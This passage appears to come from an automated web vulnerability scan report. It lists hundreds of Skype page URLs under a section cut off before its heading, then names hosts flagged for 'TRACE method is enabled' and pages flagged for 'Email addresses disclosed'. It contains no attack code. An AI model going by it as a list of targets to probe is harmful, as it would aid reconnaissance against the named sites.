18.561. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer

18.562. http://www.skype.com/intl/en-us/features/allfeatures/call-transfer/

18.563. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification

18.564. http://www.skype.com/intl/en-us/features/allfeatures/caller-identification/

18.565. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls

18.566. http://www.skype.com/intl/en-us/features/allfeatures/conference-calls/

18.567. http://www.skype.com/intl/en-us/features/allfeatures/facebook

18.568. http://www.skype.com/intl/en-us/features/allfeatures/facebook/

18.569. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls

18.570. http://www.skype.com/intl/en-us/features/allfeatures/group-video-calls/

18.571. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging

18.572. http://www.skype.com/intl/en-us/features/allfeatures/instant-messaging/

18.573. http://www.skype.com/intl/en-us/features/allfeatures/online-number

18.574. http://www.skype.com/intl/en-us/features/allfeatures/online-number/

18.575. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing

18.576. http://www.skype.com/intl/en-us/features/allfeatures/screen-sharing/

18.577. http://www.skype.com/intl/en-us/features/allfeatures/send-files

18.578. http://www.skype.com/intl/en-us/features/allfeatures/send-files/

18.579. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number

18.580. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-go-number/

18.581. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls

18.582. http://www.skype.com/intl/en-us/features/allfeatures/skype-to-skype-calls/

18.583. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

18.584. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

18.585. http://www.skype.com/intl/en-us/features/allfeatures/sms

18.586. http://www.skype.com/intl/en-us/features/allfeatures/sms/

18.587. http://www.skype.com/intl/en-us/features/allfeatures/video-call

18.588. http://www.skype.com/intl/en-us/features/allfeatures/video-call/

18.589. http://www.skype.com/intl/en-us/features/allfeatures/voicemail

18.590. http://www.skype.com/intl/en-us/features/allfeatures/voicemail/

18.591. http://www.skype.com/intl/en-us/get-skype

18.592. http://www.skype.com/intl/en-us/get-skype/

18.593. http://www.skype.com/intl/en-us/get-skype/home-phone

18.594. http://www.skype.com/intl/en-us/get-skype/home-phone/

18.595. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone

18.596. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone/

18.597. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter

18.598. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter/

18.599. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call

18.600. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call/

18.601. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux

18.602. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/

18.603. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx

18.604. http://www.skype.com/intl/en-us/get-skype/on-your-computer/macosx/

18.605. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows

18.606. http://www.skype.com/intl/en-us/get-skype/on-your-computer/windows/

18.607. http://www.skype.com/intl/en-us/get-skype/on-your-mobile

18.608. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/

18.609. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/builtin/nokia-n900

18.610. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype

18.611. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/ipad-for-skype/

18.612. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype

18.613. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/iphone-for-skype/

18.614. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android

18.615. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-android/

18.616. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian

18.617. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/download/skype-for-symbian/

18.618. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile

18.619. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-mobile/

18.620. http://www.skype.com/intl/en-us/get-skype/on-your-mobile/skype-on-3/

18.621. http://www.skype.com/intl/en-us/get-skype/on-your-tv

18.622. http://www.skype.com/intl/en-us/get-skype/on-your-tv/

18.623. http://www.skype.com/intl/en-us/get-skype/other-downloads/

18.624. http://www.skype.com/intl/en-us/legal/terms/fair_usage

18.625. http://www.skype.com/intl/en-us/legal/terms/fair_usage/

18.626. http://www.skype.com/intl/en-us/legal/terms/gvc-fair-usage/

18.627. http://www.skype.com/intl/en-us/prices

18.628. http://www.skype.com/intl/en-us/prices/

18.629. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-afghanistan

18.630. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-albania

18.631. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-algeria

18.632. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-american-samoa

18.633. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-andorra

18.634. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-angola

18.635. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-anguilla

18.636. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antarctica

18.637. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-antigua-and-barbuda

18.638. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-argentina

18.639. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-armenia

18.640. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-aruba

18.641. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ascension-islands

18.642. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-australia

18.643. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-austria

18.644. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-azerbaijan

18.645. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahamas

18.646. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bahrain

18.647. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bangladesh

18.648. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-barbados

18.649. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belarus

18.650. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belgium

18.651. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-belize

18.652. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-benin

18.653. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bermuda

18.654. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bhutan

18.655. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bolivia

18.656. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bosnia-and-herzegovina

18.657. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-botswana

18.658. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brazil

18.659. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-indian-ocean-territory

18.660. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-british-virgin-islands

18.661. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-brunei

18.662. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-bulgaria

18.663. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burkina-faso

18.664. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-burundi

18.665. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cambodia

18.666. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cameroon

18.667. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-canada

18.668. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cape-verde

18.669. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands

18.670. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic

18.671. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chad

18.672. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chile

18.673. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china

18.674. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r.

18.675. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-colombia

18.676. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-comoros

18.677. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-congo

18.678. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cook-islands

18.679. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-costa-rica

18.680. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire

18.681. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-croatia

18.682. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cuba

18.683. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cyprus

18.684. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-czech-republic

18.685. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-denmark

18.686. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-djibouti

18.687. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominica

18.688. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-dominican-republic

18.689. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ecuador

18.690. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-egypt

18.691. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-el-salvador

18.692. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-equatorial-guinea

18.693. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-eritrea

18.694. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-estonia

18.695. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ethiopia

18.696. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-falkland-islands-malvinas

18.697. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-faroe-islands

18.698. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-fiji

18.699. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-finland

18.700. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-france

18.701. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-guiana

18.702. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-french-polynesia

18.703. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gabon

18.704. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gambia

18.705. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-georgia

18.706. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-germany

18.707. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ghana

18.708. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-gibraltar

18.709. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greece

18.710. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-greenland

18.711. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-grenada

18.712. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guadeloupe

18.713. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guam

18.714. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guatemala

18.715. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea

18.716. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guinea-bissau

18.717. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-guyana

18.718. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-haiti

18.719. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-honduras

18.720. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-hungary

18.721. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iceland

18.722. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-india

18.723. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-indonesia

18.724. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inmarsat

18.725. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-inum

18.726. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iran

18.727. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-iraq

18.728. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ireland

18.729. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-israel

18.730. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-italy

18.731. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jamaica

18.732. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-japan

18.733. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-jordan

18.734. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kazakhstan

18.735. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kenya

18.736. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kiribati

18.737. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kuwait

18.738. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-kyrgyzstan

18.739. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-laos

18.740. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-latvia

18.741. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lebanon

18.742. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lesotho

18.743. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liberia

18.744. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-libya

18.745. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-liechtenstein

18.746. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-lithuania

18.747. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-luxembourg

18.748. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macao

18.749. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-macedonia

18.750. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-madagascar

18.751. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malawi

18.752. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-malaysia

18.753. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-maldives

18.754. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-mexico

18.755. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-netherlands

18.756. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-new-zealand

18.757. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-north-korea

18.758. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-norway

18.759. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-poland

18.760. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-portugal

18.761. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-puerto-rico

18.762. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-russia

18.763. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-singapore

18.764. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-south-korea

18.765. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-spain

18.766. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-sweden

18.767. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-switzerland

18.768. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-taiwan

18.769. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tanzania

18.770. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-thailand

18.771. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-the-democratic-republic-of-the-congo

18.772. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-timor-leste

18.773. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-togo

18.774. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tokelau

18.775. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tonga

18.776. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-trinidad-and-tobago

18.777. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tunisia

18.778. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkey

18.779. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turkmenistan

18.780. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-turks-and-caicos-islands

18.781. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-tuvalu

18.782. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uganda

18.783. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-ukraine

18.784. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-arab-emirates

18.785. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-kingdom

18.786. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-united-states

18.787. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uruguay

18.788. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-us-virgin-islands

18.789. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-uzbekistan

18.790. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vanuatu

18.791. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vatican-city-state-holy-see

18.792. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-venezuela

18.793. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-vietnam

18.794. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-wallis-and-futuna

18.795. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-yemen

18.796. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zambia

18.797. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-zimbabwe

18.798. http://www.skype.com/intl/en-us/prices/pay-monthly

18.799. http://www.skype.com/intl/en-us/prices/pay-monthly/

18.800. http://www.skype.com/intl/en-us/prices/payg-rates

18.801. http://www.skype.com/intl/en-us/prices/payg-rates-special-offer/

18.802. http://www.skype.com/intl/en-us/prices/payg-rates/

18.803. http://www.skype.com/intl/en-us/prices/payg-rates/connection-fees/

18.804. http://www.skype.com/intl/en-us/prices/premium

18.805. http://www.skype.com/intl/en-us/prices/premium/

18.806. http://www.skype.com/intl/en-us/prices/skype-credit

18.807. http://www.skype.com/intl/en-us/prices/skype-credit/

18.808. http://www.skype.com/intl/en-us/prices/sms-rates

18.809. http://www.skype.com/intl/en-us/prices/sms-rates/

18.810. http://www.skype.com/intl/en-us/prices/ways-to-pay/

18.811. http://www.skype.com/intl/en-us/special-offers

18.812. http://www.skype.com/intl/en-us/special-offers/

18.813. http://www.skype.com/intl/en-us/tell-a-friend/

18.814. http://www.skype.com/intl/en-us/tell-a-friend/preview/

18.815. http://www.skype.com/intl/en-us/tell-a-friend/shared/

18.816. http://www.skype.com/intl/en/business

18.817. http://www.skype.com/intl/en/business-user-guide/pc/

18.818. http://www.skype.com/intl/en/business/

18.819. http://www.skype.com/intl/en/business/download

18.820. http://www.skype.com/intl/en/business/download/

18.821. http://www.skype.com/intl/en/business/group-video

18.822. http://www.skype.com/intl/en/business/group-video/

18.823. http://www.skype.com/intl/en/business/partners/overview

18.824. http://www.skype.com/intl/en/business/skype-connect

18.825. http://www.skype.com/intl/en/business/skype-connect/

18.826. http://www.skype.com/intl/en/business/skype-manager

18.827. http://www.skype.com/intl/en/business/skype-manager/

18.828. http://www.skype.com/intl/en/campaigns/toolbar/

18.829. http://www.skype.com/intl/en/features

18.830. http://www.skype.com/intl/en/features/

18.831. http://www.skype.com/intl/en/features/allfeatures/call-forwarding

18.832. http://www.skype.com/intl/en/features/allfeatures/call-forwarding/

18.833. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles

18.834. http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles/

18.835. http://www.skype.com/intl/en/features/allfeatures/call-transfer

18.836. http://www.skype.com/intl/en/features/allfeatures/call-transfer/

18.837. http://www.skype.com/intl/en/features/allfeatures/caller-identification

18.838. http://www.skype.com/intl/en/features/allfeatures/caller-identification/

18.839. http://www.skype.com/intl/en/features/allfeatures/conference-calls

18.840. http://www.skype.com/intl/en/features/allfeatures/conference-calls/

18.841. http://www.skype.com/intl/en/features/allfeatures/facebook

18.842. http://www.skype.com/intl/en/features/allfeatures/facebook/

18.843. http://www.skype.com/intl/en/features/allfeatures/group-video-calls

18.844. http://www.skype.com/intl/en/features/allfeatures/group-video-calls/

18.845. http://www.skype.com/intl/en/features/allfeatures/instant-messaging

18.846. http://www.skype.com/intl/en/features/allfeatures/instant-messaging/

18.847. http://www.skype.com/intl/en/features/allfeatures/online-number

18.848. http://www.skype.com/intl/en/features/allfeatures/online-number/

18.849. http://www.skype.com/intl/en/features/allfeatures/screen-sharing

18.850. http://www.skype.com/intl/en/features/allfeatures/screen-sharing/

18.851. http://www.skype.com/intl/en/features/allfeatures/send-files

18.852. http://www.skype.com/intl/en/features/allfeatures/send-files/

18.853. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number

18.854. http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number/

18.855. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls

18.856. http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls/

18.857. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

18.858. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

18.859. http://www.skype.com/intl/en/features/allfeatures/sms

18.860. http://www.skype.com/intl/en/features/allfeatures/sms/

18.861. http://www.skype.com/intl/en/features/allfeatures/video-call

18.862. http://www.skype.com/intl/en/features/allfeatures/video-call/

18.863. http://www.skype.com/intl/en/features/allfeatures/voicemail

18.864. http://www.skype.com/intl/en/features/allfeatures/voicemail/

18.865. http://www.skype.com/intl/en/get-skype

18.866. http://www.skype.com/intl/en/get-skype/

18.867. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call

18.868. http://www.skype.com/intl/en/get-skype/on-your-computer/click-to-call/

18.869. http://www.skype.com/intl/en/get-skype/on-your-computer/linux

18.870. http://www.skype.com/intl/en/get-skype/on-your-computer/linux/

18.871. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx

18.872. http://www.skype.com/intl/en/get-skype/on-your-computer/macosx/

18.873. http://www.skype.com/intl/en/get-skype/on-your-computer/windows

18.874. http://www.skype.com/intl/en/get-skype/on-your-computer/windows/

18.875. http://www.skype.com/intl/en/get-skype/on-your-mobile

18.876. http://www.skype.com/intl/en/get-skype/on-your-mobile/

18.877. http://www.skype.com/intl/en/get-skype/on-your-mobile/built-in/3-skype-phone

18.878. http://www.skype.com/intl/en/get-skype/on-your-mobile/builtin/nokia-n900

18.879. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype

18.880. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/ipad-for-skype/

18.881. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype

18.882. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/iphone-for-skype/

18.883. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android

18.884. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-android/

18.885. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian

18.886. http://www.skype.com/intl/en/get-skype/on-your-mobile/download/skype-for-symbian/

18.887. http://www.skype.com/intl/en/get-skype/on-your-mobile/skype-on-3/

18.888. http://www.skype.com/intl/en/get-skype/on-your-tv

18.889. http://www.skype.com/intl/en/get-skype/on-your-tv/

18.890. http://www.skype.com/intl/en/get-skype/other-downloads/

18.891. http://www.skype.com/intl/en/prices

18.892. http://www.skype.com/intl/en/prices/

18.893. http://www.skype.com/intl/en/prices/pay-monthly

18.894. http://www.skype.com/intl/en/prices/pay-monthly/

18.895. http://www.skype.com/intl/en/prices/payg-rates

18.896. http://www.skype.com/intl/en/prices/payg-rates/

18.897. http://www.skype.com/intl/en/prices/premium

18.898. http://www.skype.com/intl/en/prices/premium/

18.899. http://www.skype.com/intl/en/prices/skype-credit

18.900. http://www.skype.com/intl/en/prices/skype-credit/

18.901. http://www.skype.com/intl/en/prices/sms-rates

18.902. http://www.skype.com/intl/en/prices/sms-rates/

18.903. http://www.skype.com/intl/en/prices/subscriptions/

18.904. http://www.skype.com/intl/en/prices/ways-to-pay/

18.905. http://www.skype.com/intl/en/special-offers

18.906. http://www.skype.com/intl/en/special-offers/

18.907. http://www.skype.com/products

18.908. https://www.trustwave.com/

18.909. https://www.trustwave.com/web-application-firewall/

18.910. http://www.w3schools.com/banners/aspallbannerframe.asp

18.911. http://www.w3schools.com/banners/aspallframe.asp

18.912. http://www.w3schools.com/js/js_ex_dom.asp

18.913. http://www.w3schools.com/jsref/dom_obj_base.asp

18.914. http://www.w3schools.com/jsref/dom_obj_frame.asp

18.915. http://www.w3schools.com/jsref/event_frame_onload.asp

18.916. http://www.w3schools.com/tryitbanner.asp

18.917. http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps

19. TRACE method is enabled

19.1. http://142.xg4ken.com/

19.2. http://afe.specificclick.net/

19.3. http://apps.sapha.com/

19.4. http://apr.lijit.com/

19.5. http://blogs.skype.com/

19.6. https://blogs.skype.com/

19.7. http://cache.specificmedia.com/

19.8. http://ce.lijit.com/

19.9. http://dce.sapha.com/

19.10. https://developer.skype.com/

19.11. http://embed.technorati.com/

19.12. http://pixel.33across.com/

19.13. http://rotation.linuxnewmedia.com/

19.14. http://shop.skype.com/

19.15. http://vap1den1.lijit.com/

19.16. http://vap2den1.lijit.com/

19.17. http://vap3den1.lijit.com/

19.18. http://welcome.hp-ww.com/

19.19. http://www.cymphonix.com/

19.20. http://www.lijit.com/

19.21. http://www.typepad.com/

19.22. http://www.xg4ken.com/

20. Email addresses disclosed

20.1. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

20.2. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

20.3. http://blogs.skype.com/en/2005/05/

20.4. http://blogs.skype.com/en/2005/06/

20.5. http://blogs.skype.com/en/2005/07/

20.6. http://blogs.skype.com/en/2005/08/

20.7. http://blogs.skype.com/en/2005/09/

20.8. http://blogs.skype.com/en/2005/10/

20.9. http://blogs.skype.com/en/2005/11/

20.10. http://blogs.skype.com/en/2005/12/

20.11. http://blogs.skype.com/en/2006/01/

20.12. http://blogs.skype.com/en/2006/02/

20.13. http://blogs.skype.com/en/2006/03/

20.14. http://blogs.skype.com/en/2006/04/

20.15. http://blogs.skype.com/en/2006/05/

20.16. http://blogs.skype.com/en/2006/06/

20.17. http://blogs.skype.com/en/2006/07/

20.18. http://blogs.skype.com/en/2006/08/

20.19. http://blogs.skype.com/en/2006/09/

20.20. http://blogs.skype.com/en/2006/10/

20.21. http://blogs.skype.com/en/2006/11/

20.22. http://blogs.skype.com/en/2006/12/

20.23. http://blogs.skype.com/en/2007/01/

20.24. http://blogs.skype.com/en/2007/02/

20.25. http://blogs.skype.com/en/2007/03/

20.26. http://blogs.skype.com/en/2007/05/

20.27. http://blogs.skype.com/en/2007/06/

20.28. http://blogs.skype.com/en/2007/07/

20.29. http://blogs.skype.com/en/2007/08/

20.30. http://blogs.skype.com/en/2007/10/

20.31. http://blogs.skype.com/en/2007/11/

20.32. http://blogs.skype.com/en/2008/01/

20.33. http://blogs.skype.com/en/2008/04/

20.34. http://blogs.skype.com/en/2008/06/

20.35. http://blogs.skype.com/en/2008/07/

20.36. http://blogs.skype.com/en/2008/09/

20.37. http://blogs.skype.com/en/2008/10/

20.38. http://blogs.skype.com/en/2009/03/

20.39. http://blogs.skype.com/en/2009/08/

20.40. http://blogs.skype.com/en/2009/10/

20.41. http://blogs.skype.com/en/2009/11/

20.42. http://blogs.skype.com/en/2010/01/

20.43. http://blogs.skype.com/en/2010/02/

20.44. http://blogs.skype.com/en/2010/03/

20.45. http://blogs.skype.com/en/2010/04/

20.46. http://blogs.skype.com/en/2010/07/

20.47. http://blogs.skype.com/en/2010/08/

20.48. http://blogs.skype.com/en/2010/09/

20.49. http://blogs.skype.com/en/2010/10/

20.50. http://blogs.skype.com/en/2010/11/

20.51. http://blogs.skype.com/en/2010/12/

20.52. http://blogs.skype.com/en/2011/05/

20.53. http://blogs.skype.com/en/2011/07/

20.54. http://blogs.skype.com/en/2011/08/

20.55. http://blogs.skype.com/en/corporate/

20.56. http://blogs.skype.com/en/education/

20.57. http://blogs.skype.com/en/mobile/

20.58. http://blogs.skype.com/en/social_good/

